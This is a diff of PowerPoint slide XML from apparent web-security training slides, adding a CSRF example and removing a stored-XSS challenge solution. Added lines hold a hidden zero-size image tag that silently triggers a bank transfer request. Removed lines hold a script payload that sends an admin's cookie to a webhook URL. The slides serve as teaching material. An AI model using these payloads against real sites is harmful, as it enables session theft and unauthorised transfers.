-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="292971" y="6365895"/>
-            <a:ext cx="6097218" cy="246221"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1000" dirty="0">
+              <a:t>Consider the following classic </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="bg1"/>
                 </a:solidFill>
-                <a:effectLst/>
                 <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                 <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               </a:rPr>
-              <a:t>Example – Stored XSS</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-IL" sz="1000" dirty="0">
+              <a:t>scenario:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>A bank website has authenticated a user and gave them a session cookie that keep them logged in.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>The request of transfer money look like this:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>http://securibank.com/transfer.do?acct=[RECEPIENT]&amp;amount=[DOLLARS]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>Attacker can use this to send an email with hyperlink or create an invisible image that will do the request automatically </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>&lt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>img</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>src</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>="http://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>securibank.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>transfer.do?acct</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>=[RECEPIENT]&amp;amount=[DOLLARS]" width="0" height="0" border="0"&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="bg1"/>
               </a:solidFill>
@@ -10772,14 +9347,45 @@
               <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:lnSpc>
+                <a:spcPts val="2560"/>
+              </a:lnSpc>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="10" name="Picture 9">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F67AEC4-71D1-89EA-5D3E-E83882E2C956}"/>
+          <p:cNvPr id="7" name="Picture 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10795,8 +9401,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9000489" y="6377732"/>
-            <a:ext cx="2717380" cy="221561"/>
+            <a:off x="8370558" y="524524"/>
+            <a:ext cx="2989117" cy="243717"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10805,10 +9411,10 @@
       </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="16" name="TextBox 15">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A670BD-4775-42AB-9ECC-A2EBC19E5B98}"/>
+          <p:cNvPr id="2" name="TextBox 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10817,8 +9423,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="619770" y="1580082"/>
-            <a:ext cx="11755162" cy="5447645"/>
+            <a:off x="633984" y="1254616"/>
+            <a:ext cx="2830735" cy="1195199"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10826,155 +9432,41 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="square" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stockee-1 - </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="6000" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Solution:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>The app is vulnerable to stored XSS, as the name suggests. One thing that the description doesn’t mention, is that there’s an admin bot (with high privileges) regularly visiting the website – i.e. executing our XSS code. We need to steal their cookie, so we need our XSS code, that runs on their browser when they view the website to somehow send the cookie to us.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>We can set up a webhook for that (which is just a service that shows us all requests made to it’s URL). There plenty of sites that implement this, one example is </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>https://webhook.site/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>. So we get the URL it’s providing us, and write something like this as a comment: &lt;script&gt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>window.location</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> = “OUR_URL/” + </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>document.cookie</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>&lt;/script&gt; - when the admin visits </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>the site, this </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>will concatenate the admin’s cookies to the URL and navigate to it, triggering our webhook, and we can get the cookie. </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-IL" dirty="0">
+            <a:pPr algn="l">
+              <a:lnSpc>
+                <a:spcPts val="4280"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="24272C"/>
+                </a:solidFill>
+                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>Example - CSRF</a:t>
+            </a:r>
+            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
               <a:solidFill>
-                <a:schemeClr val="bg1"/>
+                <a:srgbClr val="24272C"/>
               </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              <a:effectLst/>
+              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
             </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1403391500"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385019689"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
